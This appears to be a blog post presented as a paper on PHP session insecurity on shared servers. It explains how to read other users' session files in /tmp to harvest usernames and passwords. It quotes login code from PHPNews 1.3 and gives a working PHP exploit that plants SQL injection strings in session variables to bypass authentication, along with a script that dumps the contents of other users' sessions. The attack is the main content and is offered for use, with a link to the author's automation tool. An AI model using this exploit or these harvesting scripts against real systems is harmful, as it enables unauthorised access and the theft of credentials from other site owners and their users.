[Paper] Insecurity in PHP sessions By Xianur0
Posted on 17:22 by Xianur0
[Paper] Insecurity in PHP sessions By Xianur0
The sessions as its name says are user sessions (contain any information or ID of the user). The sessions being used on a shared server can be very serious security flaws, namely those sessions can be used for certain kinds of attacks, including a data mining (search for useful information) for example, if we go to the temporary directory used by PHP to store sessions (almost always is / tmp /) you can find sessions like this:
user|s:5:"admin";password|s:11:"mipassword";
where is the user name of the first session, 5 is the id and admin is the content, with the same password (second session).
Now we already have a username and a password.
Also, many developers overlook the possibility of Injection data sessions as the example below:
Vulnerable code (PHPNews 1.3):
if((isset($_POST['user']) && isset($_POST['password'])) || (isset($_SESSION['user']) && isset($_SESSION['password'])))
{
if(isset($_SESSION['user']) && isset($_SESSION['password']))
{
$in_user = $_SESSION['user'];
$in_password = $_SESSION['password'];
}
else if(isset($_POST['user']) && isset($_POST['password']))
{
if (!get_magic_quotes_gpc())
{
$in_user = addslashes($_POST['user']);
$in_password = addslashes($_POST['password']);
}
else
{
$in_user = $_POST['user'];
$in_password = $_POST['password'];
}
}
$result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = \'' . $in_user . '\' AND password = password(\'' . $in_password . '\')');
$dbQueries++;
if(mysql_numrows($result) != 0)
{
$auth = true;
$_SESSION['user'] = $in_user;
$_SESSION['password'] = $in_password;
}
else
{
$bad_details = true;
}
Exploit Bypass through sessions:
<?php
session_start();
$_SESSION["user"] = "' OR '1'='1";
$_SESSION["password"] = "') OR ('1'='1";
print "Cookie Master: <br>\nPHPSESSID=".$_COOKIE['PHPSESSID']."<br>\n";
?>
the sessions are not filtered, therefore you can set up these sessions and Injection data, the exploit to schedule (above) only works if the php is using the same route of the sessions that PHPNews.
Although the safemode and this can not be bypassed directories, almost always used the same route on a temporary server for everything. So the sessions can be generated without regard to the security mechanisms that are used (enjoyable clear change the temporary directory to a free reading by another user on the same server and is completely filtering the sessions).
But can be read by the sessions that are held as temporary files and directories that time spent almost always reading for all users of that server.
You can also obtain the content of the sessions when you can not read the files directly:
<?php
@session_start();
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
?>
PHP opens the temporary directory of sessions with the call to the global variable $_SESSION (that is not filtered in safemode), so we give the value of the sessions (the code that travels the HTTP is only a reference to the file session on the server) whatever the domain (you can specify the directory of sessions with the function session_save_path()).
I wrote a tool to automate this process:
http://xianur0.blogspot.com/2008/10/session-master-by-xianur0.html